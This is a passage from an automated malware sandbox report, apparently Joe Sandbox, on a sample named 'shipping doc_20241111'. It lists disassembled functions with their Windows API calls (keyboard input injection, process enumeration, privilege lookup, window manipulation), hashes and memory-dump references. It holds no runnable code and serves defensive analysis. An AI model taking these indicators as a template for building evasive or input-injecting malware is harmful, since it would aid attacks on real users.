Opcode Fuzzy Hash: 72f4223fc569c65e0535c25f2e372cd28349750030db79a77b24b053135bc3f1
Instruction Fuzzy Hash: D931A131E55A08BFEB359E68CC45BE83763AB05B62F5C4103FA11963E1C375A948BB81

Function 00FAAABA Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00FAAB0F
SetKeyboardState.USER32(00000080,?,00008000), ref: 00FAAB2B
PostMessageW.USER32(00000000,00000101,00000000), ref: 00FAAB92
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00FAABE4

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: d8a761bcad70cff88e1f1c14a2c1fa92849908bc4fc03200a3d46d0aaa882ebd
Instruction ID: 316655c43cc7bc73aefae9936b9a4a3a0da99fa1b1b21e378a333fe537e35c94
Opcode Fuzzy Hash: d8a761bcad70cff88e1f1c14a2c1fa92849908bc4fc03200a3d46d0aaa882ebd
Instruction Fuzzy Hash: 9B310AB0D40208AEEF318B64C815BFE7B67ABCA370F04425EE495561D1C3789989F7B2

Function 00FD7543 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00FD7569
GetWindowRect.USER32(?,?), ref: 00FD75DF
PtInRect.USER32(?,?,00FD8A7B), ref: 00FD75EF
MessageBeep.USER32(00000000), ref: 00FD765B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 7e8dc5fd9193d80d04aa2946d2accf9c879ea5deab001e6c7a8d462d2f640d14
Instruction ID: e2c63a5581d7854389a31d186d75cb0316416cfe108cc116bc507efdf1634e28
Opcode Fuzzy Hash: 7e8dc5fd9193d80d04aa2946d2accf9c879ea5deab001e6c7a8d462d2f640d14
Instruction Fuzzy Hash: 5A41AD30A096059FCB11EF68D484FA977F3BF48320F1841AAE5649F350E735E941EB90

Function 00FD160D Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00FD161E

Part of subcall function 00FA3985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FA399F
Part of subcall function 00FA3985: GetCurrentThreadId.KERNEL32 ref: 00FA39A6
Part of subcall function 00FA3985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FA24F7), ref: 00FA39AD

GetCaretPos.USER32(?), ref: 00FD1632
ClientToScreen.USER32(00000000,?), ref: 00FD167F
GetForegroundWindow.USER32 ref: 00FD1685

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d50b2f6a34276f91783b01b4f92b7db98500aa2fac38758ba571d954a9c6b414
Instruction ID: b5902be27049ac67220bf60a1e38835d4addce8ad3414e8147192f418daaa665
Opcode Fuzzy Hash: d50b2f6a34276f91783b01b4f92b7db98500aa2fac38758ba571d954a9c6b414
Instruction Fuzzy Hash: 61314371D01109AFDB00EFA5C8818AEBBF9FF89344B54806AE415E7211DB35DE05DB90

Function 00FAD3FA Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00FAD41F
Process32FirstW.KERNEL32(00000000,?), ref: 00FAD42D
Process32NextW.KERNEL32(00000000,?), ref: 00FAD44D
CloseHandle.KERNEL32(00000000), ref: 00FAD4FA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 6b957bfc48d52b3ea229efc96dd4f125826149dec3ba73e1667f23812bf42e71
Instruction ID: ce00e6c059a4fe4cc6610800bef5cf10e9d0f952598449994a2be8050eed0122
Opcode Fuzzy Hash: 6b957bfc48d52b3ea229efc96dd4f125826149dec3ba73e1667f23812bf42e71
Instruction Fuzzy Hash: BA3193721083019FD310EF60CC85AAFBFE8AFDA350F04052DF981861A2EB75A945DB92

Function 00FD8EBB Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5B021: GetWindowLongW.USER32(?,000000EB), ref: 00F5B032

GetCursorPos.USER32(?), ref: 00FD8EF3
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F980CE,?,?,?,?,?), ref: 00FD8F08
GetCursorPos.USER32(?), ref: 00FD8F50
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F980CE,?,?,?), ref: 00FD8F86

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 88c4a80c76b6a4d2dd7ad179d05e3f61d8f910a8f6c1add435e9dcb1da5b6b35
Instruction ID: 1205bbe41b85481bfa7c4713aa2cf5b5e5dc8c488a49c7195a2db68c07b7fa66
Opcode Fuzzy Hash: 88c4a80c76b6a4d2dd7ad179d05e3f61d8f910a8f6c1add435e9dcb1da5b6b35
Instruction Fuzzy Hash: 3921D335501018BFDB258F64CC48EFA7BBBEB493A1F084156FA06472A1C7359952EB50

Function 00FAD1DF Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00FDD034), ref: 00FAD219
GetLastError.KERNEL32 ref: 00FAD228
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FAD237
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00FDD034), ref: 00FAD294

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: a02e6c336f4876986b68085d21a1a0f11bc76e73f332b202181f5dd92dfb3cbf
Instruction ID: 63bf4e90f96a93b293e3825219e3d444ac80b9f036905fe41a3bc48c55f46ffb
Opcode Fuzzy Hash: a02e6c336f4876986b68085d21a1a0f11bc76e73f332b202181f5dd92dfb3cbf
Instruction Fuzzy Hash: 702197B15052019F8710EF34C88165ABBE8EF57368F104A1EF89AC72A1D730DD46EB82

Function 00FA14B5 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FA0F6E
Part of subcall function 00FA0F58: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0F7A
Part of subcall function 00FA0F58: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0F89
Part of subcall function 00FA0F58: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0F90
Part of subcall function 00FA0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA0FA6

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FA1502
_memcmp.LIBVCRUNTIME ref: 00FA1525
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA155B
HeapFree.KERNEL32(00000000), ref: 00FA1562

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: bf3af6389e88bdee8a96f5c2bf9d1cce99021c29753162d5e83efdedb490cbf2
Instruction ID: 5a1f377bdad765835e7c002eefba4541be4040fbf193cdad54883b53606acd7f
Opcode Fuzzy Hash: bf3af6389e88bdee8a96f5c2bf9d1cce99021c29753162d5e83efdedb490cbf2
Instruction Fuzzy Hash: 65218EB1E41109EFDF10DFA8C945BEEB7B8FF85321F194059E456A7241E730AA09EB90

Function 00FD26B5 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00FD273D
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FD2757
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00FD2765
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00FD2773

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: ad1b6cfba5c6c5f0506c9a54b983107be5c737260cb8b4d8d974e121cc8472e2
Instruction ID: 2af9f4a27d8e2279c6baac5594525d4f02eef6b84371a44536abbac27d5ec323
Opcode Fuzzy Hash: ad1b6cfba5c6c5f0506c9a54b983107be5c737260cb8b4d8d974e121cc8472e2
Instruction Fuzzy Hash: 3C210331205111AFD7609B24CC44FAA7B96AF52324F18815AF8268B3D2C775FC42EBD0

Function 00FA784B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA8CD3: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00FA7860,?,000000FF,?,00FA86AA,00000000,?,0000001C,?,?), ref: 00FA8CE2
Part of subcall function 00FA8CD3: lstrcpyW.KERNEL32(00000000,?,?,00FA7860,?,000000FF,?,00FA86AA,00000000,?,0000001C,?,?,00000000), ref: 00FA8D08
Part of subcall function 00FA8CD3: lstrcmpiW.KERNEL32(00000000,?,00FA7860,?,000000FF,?,00FA86AA,00000000,?,0000001C,?,?), ref: 00FA8D39

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00FA86AA,00000000,?,0000001C,?,?,00000000), ref: 00FA7879
lstrcpyW.KERNEL32(00000000,?,?,00FA86AA,00000000,?,0000001C,?,?,00000000), ref: 00FA789F
lstrcmpiW.KERNEL32(00000002,cdecl,?,00FA86AA,00000000,?,0000001C,?,?,00000000), ref: 00FA78DA

Strings

cdecl, xrefs: 00FA78D1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: cd75f8aaa580b2398794d1370e7572aa8ab362ccc69fe724ed186d38b34d66ae
Instruction ID: 40099546cbac85f3f12d7ea56288bd0ebc4a6bf8ca4db17b72fc8501c02ea4b1
Opcode Fuzzy Hash: cd75f8aaa580b2398794d1370e7572aa8ab362ccc69fe724ed186d38b34d66ae
Instruction Fuzzy Hash: C411297A604346ABCB146F38CC48E7B77A9FF46360B50402AF902C7250EF75D811E7A1

Function 00FD5595 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 00FD55F0
_wcslen.LIBCMT ref: 00FD5602
_wcslen.LIBCMT ref: 00FD560D
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FD574B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: a063ee58c93fbefae9587439537e6bcd5559fa01e9779bd32fd53fc721547e9c
Instruction ID: 74034cdf24ae61f8cb2c8816ddc25b89bc7e8b9280c5aba67012aad1540ba5e7
Opcode Fuzzy Hash: a063ee58c93fbefae9587439537e6bcd5559fa01e9779bd32fd53fc721547e9c
Instruction Fuzzy Hash: BD11B972A0060896DB20DF659C84BFE77AEEF11B64F18413BF915D6280EB74D944EF60

Function 00F71C99 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e22e5ed0f26a5db148fe37f371463c799b736647a7209ee4dd4845743cbab286
Instruction ID: 12e9e4af3fc7d12c67f8f441f2f19be19b32554746a777ae3cf5025b666a66e2
Opcode Fuzzy Hash: e22e5ed0f26a5db148fe37f371463c799b736647a7209ee4dd4845743cbab286
Instruction Fuzzy Hash: D801D4B26052163EF631167C7CC1F67731DEF41374B348327B128911D2DA648C457562

Function 00FA196B Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00FA198B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA199D
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA19B3
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FA19CE

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 934709058d0915dba859399f7aa06c3ed626b23dff79877690b3d2259c9d1c1f
Instruction ID: f2b589a1a540b7fdbde7766b86b24a6a4a47c2749fdbab7a0b40017e46ace48b
Opcode Fuzzy Hash: 934709058d0915dba859399f7aa06c3ed626b23dff79877690b3d2259c9d1c1f
Instruction Fuzzy Hash: BE113C7AD00218FFEF109BA5CD85F9EBB78FB09754F210091E604B7290D6716E10EB94

Function 00FAE0F4 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FAE11B
MessageBoxW.USER32(?,?,?,?), ref: 00FAE14E
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FAE164
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FAE16B

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 676a43eedfb1d085c1f8636884a6fc6a1ab28b0c467882c5949a973441e322cb
Instruction ID: f18462d877a40b98ae05db7205820227de04c108e80ec0ecf4f6d940c807d87c
Opcode Fuzzy Hash: 676a43eedfb1d085c1f8636884a6fc6a1ab28b0c467882c5949a973441e322cb
Instruction Fuzzy Hash: 101108B6E0022DBFC7119BB89C09A9E3BADAB46324F048116F910D3281D6B9890497A0

Function 00F6D15C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,00F6CF89,00000000,00000004,00000000), ref: 00F6D1A8
GetLastError.KERNEL32 ref: 00F6D1B4
__dosmaperr.LIBCMT ref: 00F6D1BB
ResumeThread.KERNEL32(00000000), ref: 00F6D1D9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: f4b980dc917fcb5f97b671c1c1c772e097e5b5447e93ce3aeae03217005bfde7
Instruction ID: 931ff73c371c97f256e2cc7ce420adf6b288ab575dc5812e3f25f6a0d723a69c
Opcode Fuzzy Hash: f4b980dc917fcb5f97b671c1c1c772e097e5b5447e93ce3aeae03217005bfde7
Instruction Fuzzy Hash: BA01F936E051087BEB105BB5DC05BAA7B69EF46730F104319F924821D0CFB48941F6E0

Function 00FD9DE5 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 00F5B021: GetWindowLongW.USER32(?,000000EB), ref: 00F5B032

GetClientRect.USER32(?,?), ref: 00FD9E23
GetCursorPos.USER32(?), ref: 00FD9E2D
ScreenToClient.USER32(?,?), ref: 00FD9E38
DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00FD9E6C

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 5988cef7e02ec92664a15f7945e895c2caf7da4c77cbd725953de729c3a6cd73
Instruction ID: 99ecc6ad21430084bef863f0876acd2a202aa1373211c577ef6a2ec117f8308c
Opcode Fuzzy Hash: 5988cef7e02ec92664a15f7945e895c2caf7da4c77cbd725953de729c3a6cd73
Instruction Fuzzy Hash: 6E11973290001AABCF01EFA8D8859EE77BAFB05311F480542F912E3241C374AA85EBB1

Function 00F479B6 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F479F4
GetStockObject.GDI32(00000011), ref: 00F47A08
SendMessageW.USER32(00000000,00000030,00000000), ref: 00F47A12

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 318be59e136ce072e4dc05cd04afc575704b542bded56ade2723e69d8dbc6e1e
Instruction ID: 08867627d3aa7490139fccbd23ea4b7b0d8505c7c8aaa7ceecd7c9c04d2c4ef6
Opcode Fuzzy Hash: 318be59e136ce072e4dc05cd04afc575704b542bded56ade2723e69d8dbc6e1e
Instruction Fuzzy Hash: AE115E72506609BFEF119FA49C44EEABF6AEF18364F040116FE1452160C7399D60FBE0

Function 00F63ACC Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00F63AE6

Part of subcall function 00F63A33: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00F63A62
Part of subcall function 00F63A33: ___AdjustPointer.LIBCMT ref: 00F63A7D

_UnwindNestedFrames.LIBCMT ref: 00F63AFB
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00F63B0C
CallCatchBlock.LIBVCRUNTIME ref: 00F63B34

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
